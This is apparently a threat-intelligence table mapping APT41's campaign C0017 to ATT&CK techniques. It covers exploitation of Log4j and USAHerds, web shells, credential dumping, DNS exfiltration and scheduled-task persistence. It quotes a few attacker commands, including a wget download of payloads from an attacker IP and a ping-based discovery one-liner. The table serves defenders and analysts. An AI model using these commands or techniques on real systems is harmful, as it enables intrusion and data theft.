Domain | ID | Name | Use
enterprise | T1134 | Access Token Manipulation | During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local NT AUTHORITY\SYSTEM privilege escalation.
enterprise | T1071 | Application Layer Protocol | -
enterprise | T1071.001 | Web Protocols | During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads.
enterprise | T1560 | Archive Collected Data | -
enterprise | T1560.003 | Archive via Custom Method | During C0017, APT41 hex-encoded PII data prior to exfiltration.
enterprise | T1059 | Command and Scripting Interpreter | -
enterprise | T1059.003 | Windows Command Shell | During C0017, APT41 used cmd.exe to execute reconnaissance commands.
enterprise | T1059.007 | JavaScript | During C0017, APT41 deployed JScript web shells on compromised systems.
enterprise | T1005 | Data from Local System | During C0017, APT41 collected information about compromised machines as well as Personally Identifiable Information (PII) from victim networks.
enterprise | T1001 | Data Obfuscation | -
enterprise | T1001.003 | Protocol Impersonation | During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.
enterprise | T1074 | Data Staged | -
enterprise | T1074.001 | Local Data Staging | During C0017, APT41 copied the local SAM and SYSTEM Registry hives to a staging directory.
enterprise | T1140 | Deobfuscate/Decode Files or Information | During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.
enterprise | T1048 | Exfiltration Over Alternative Protocol | -
enterprise | T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol | During C0017, APT41 exfiltrated victim data via DNS lookups by encoding it and prepending it as subdomains to the attacker-controlled domain.
enterprise | T1041 | Exfiltration Over C2 Channel | During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.
enterprise | T1567 | Exfiltration Over Web Service | During C0017, APT41 used Cloudflare services for data exfiltration.
enterprise | T1190 | Exploit Public-Facing Application | During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.
enterprise | T1068 | Exploitation for Privilege Escalation | During C0017, APT41 abused named pipe impersonation for privilege escalation.
enterprise | T1574 | Hijack Execution Flow | During C0017, APT41 established persistence by loading malicious libraries via modifications to the Import Address Table (IAT) within legitimate Microsoft binaries.
enterprise | T1105 | Ingress Tool Transfer | During C0017, APT41 downloaded malicious payloads onto compromised systems.
enterprise | T1036 | Masquerading | -
enterprise | T1036.004 | Masquerade Task or Service | During C0017, APT41 used SCHTASKS /Change to modify legitimate scheduled tasks to run malicious code.
enterprise | T1036.005 | Match Legitimate Name or Location | During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx, likely to avoid hunting detections.
enterprise | T1027 | Obfuscated Files or Information | During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.
enterprise | T1027.002 | Software Packing | During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.
enterprise | T1588 | Obtain Capabilities | -
enterprise | T1588.002 | Tool | For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.
enterprise | T1003 | OS Credential Dumping | -
enterprise | T1003.002 | Security Account Manager | During C0017, APT41 copied the SAM and SYSTEM Registry hives for credential harvesting.
enterprise | T1090 | Proxy | During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.
enterprise | T1053 | Scheduled Task/Job | -
enterprise | T1053.005 | Scheduled Task | During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: \Microsoft\Windows\PLA\Server Manager Performance Monitor, \Microsoft\Windows\Ras\ManagerMobility, \Microsoft\Windows\WDI\SrvSetupResults, and \Microsoft\Windows\WDI\USOShared.
enterprise | T1505 | Server Software Component | -
enterprise | T1505.003 | Web Shell | During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.
enterprise | T1082 | System Information Discovery | During C0017, APT41 issued ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+ commands to find the volume serial number of compromised systems.
enterprise | T1016 | System Network Configuration Discovery | During C0017, APT41 used cmd.exe /c ping %userdomain% for discovery.
enterprise | T1033 | System Owner/User Discovery | During C0017, APT41 used whoami to gather information from victim machines.
enterprise | T1102 | Web Service | During C0017, APT41 used Cloudflare services for C2 communications.
enterprise | T1102.001 | Dead Drop Resolver | During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably, APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.